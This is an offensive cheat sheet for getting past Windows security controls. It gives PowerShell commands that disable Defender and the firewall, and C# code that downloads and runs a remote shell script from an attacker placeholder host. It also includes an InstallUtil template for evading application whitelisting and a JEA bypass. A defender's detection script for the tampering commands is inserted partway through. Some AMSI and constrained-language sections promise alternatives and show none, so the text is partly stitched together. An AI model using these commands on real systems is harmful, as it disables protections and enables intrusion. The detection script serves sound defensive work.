This section contains several techniques to bypass or defeat security controls, safeguards, or defensive mechanisms put in place by an organization to protect its systems and data.
Disable AV & Firewall
    # Alternative 1
    Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true

    # Alternative 2
    "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
    Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False
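A defender-side check for the three commands above, as an added example that is not part of the original page: it scans command lines taken from process-creation or PowerShell script block logs for Defender and firewall tampering. The rule names, `detect`, `triage` and the sample records are assumptions constructed for illustration.

```python
import re

# Literals PowerShell accepts for on/off; names are case-insensitive (re.I).
_ON = r"(?:\$true|1)\b"
_OFF = r"(?:\$false|false|0)\b"
DEFENDER_PARAM = re.compile(r"-(Disable\w+)[\s:]+" + _ON, re.I)
RULES = {
    "defender_protection_disabled": re.compile(r"\bSet-MpPreference\b", re.I),
    "defender_definitions_removed": re.compile(
        r"\bMpCmdRun(?:\.exe)?\b.*-RemoveDefinitions\b", re.I),
    "firewall_profile_disabled": re.compile(
        r"\bSet-NetFirewallProfile\b.*-Enabled[\s:]+" + _OFF, re.I),
}
# Constructed sample records (host, command line); not taken from a real host.
SAMPLE_EVENTS = [
    ("WS01", "powershell.exe -c Set-MpPreference -DisableRealtimeMonitoring $true "
             "-disableioavprotection:$true"),
    ("WS01", '"C:\\Program Files\\Windows Defender\\MpCmdRun.exe" -RemoveDefinitions -All'),
    ("WS02", "Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False"),
    ("WS03", "Set-MpPreference -DisableRealtimeMonitoring $false"),  # re-enables
    ("WS03", "Get-NetFirewallProfile -Profile Domain"),  # read-only query
]

def detect(command_line):
    """Return sorted (rule, detail) findings for one command line."""
    findings = []
    for rule, pattern in RULES.items():
        if not pattern.search(command_line):
            continue
        detail = ""
        if rule == "defender_protection_disabled":
            # Alert only when a -Disable* setting is switched on; turning
            # protection back on ($false) is not a finding.
            params = {p.lower() for p in DEFENDER_PARAM.findall(command_line)}
            if not params:
                continue
            detail = ",".join(sorted(params))
        findings.append((rule, detail))
    return sorted(findings)

def triage(events):
    """Group findings by host so repeated tampering on one machine stands out."""
    by_host = {}
    for host, command_line in events:
        for finding in detect(command_line):
            by_host.setdefault(host, []).append(finding)
    return by_host

if __name__ == "__main__":
    print(triage(SAMPLE_EVENTS))
```

A host that trips more than one rule in a short window, as WS01 does in the sample, is a stronger signal than any single hit.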
Antimalware Scan Interface (AMSI)
The Antimalware Scan Interface (AMSI) is a security feature in Windows operating systems that provides a standardized interface for antivirus and other security applications to integrate with scripting engines and applications.
To disable AMSI on PowerShell you can execute any of the following alternatives.
Constrained Language Mode is a security feature designed to restrict the capabilities of PowerShell scripts, making them more secure and less prone to exploitation. When Constrained Language Mode is enabled, PowerShell restricts the use of certain language elements and cmdlets to help prevent potential malicious activities.
There are several alternatives to obtain a PowerShell process with a new RunSpace.
    // Console APP (.NET Framework)
    using System;
    // right-click the References folder in the Solution Explorer and select Add Reference
    // Click on Assemblies menu (left-hand side) and look for System.Configuration.Install
    using System.Configuration.Install;
    // right-click the References folder in the Solution Explorer and select Add Reference
    // select the Browse… button at the bottom of the window and navigate to
    // C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll
    using System.Management.Automation;
    using System.Management.Automation.Runspaces;

    namespace Bypass
    {
        class Program
        {
            static void Main(string[] args)
            {
                String cmd = "(New-Object System.Net.WebClient).DownloadString('http://<YOUR_IP>/shell.ps1') | IEX";
                Runspace rs = RunspaceFactory.CreateRunspace();
                rs.Open();
                PowerShell ps = PowerShell.Create();
                ps.Runspace = rs;
                ps.AddScript(cmd);
                ps.Invoke();
                rs.Close();
            }
        }
    }
Compile the following CSharp code in Visual Studio as clm.exe.
    // Console APP (.NET Framework)
    using System;
    // right-click the References folder in the Solution Explorer and select Add Reference
    // Click on Assemblies menu (left-hand side) and look for System.Configuration.Install
    using System.Configuration.Install;
    // right-click the References folder in the Solution Explorer and select Add Reference
    // select the Browse… button at the bottom of the window and navigate to
    // C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll
    using System.Management.Automation;
    using System.Management.Automation.Runspaces;

    namespace Bypass
    {
        class Program
        {
            static void Main(string[] args)
            {
                // the Main method is not part of the application whitelisting, it can be used for other purposes, like bypassing AVs
                Console.WriteLine("Totatlly useless");
            }
        }

        [System.ComponentModel.RunInstaller(true)]
        public class Sample : System.Configuration.Install.Installer
        {
            public override void Uninstall(System.Collections.IDictionary savedState)
            {
                <YOUR_MALICIOUS_CHSARP_CODE>
            }
        }
    }
Use installutil.exe to execute clm.exe so the Uninstall method is executed.
Proxy servers are commonly employed in networks to monitor and control internet traffic, and they may inspect and filter PowerShell-related activities. Attackers, however, may employ various evasion techniques to circumvent these security measures.
Just Enough Administration (JEA) is a security feature in Windows Server that allows administrators to delegate specific administrative tasks to users, limiting their permissions to only what is necessary for those tasks. JEA helps organizations enhance security by reducing the risk associated with providing broad administrative access.
A simple JEA bypass is to create a new function and call it.

    function CommandName { whoami | out-host }
If powershell_shell dies, it is quite likely that the whole meterpreter reverse shell will die.
Having write access to a directory does not mean that we can execute files from it when AppLocker is enabled.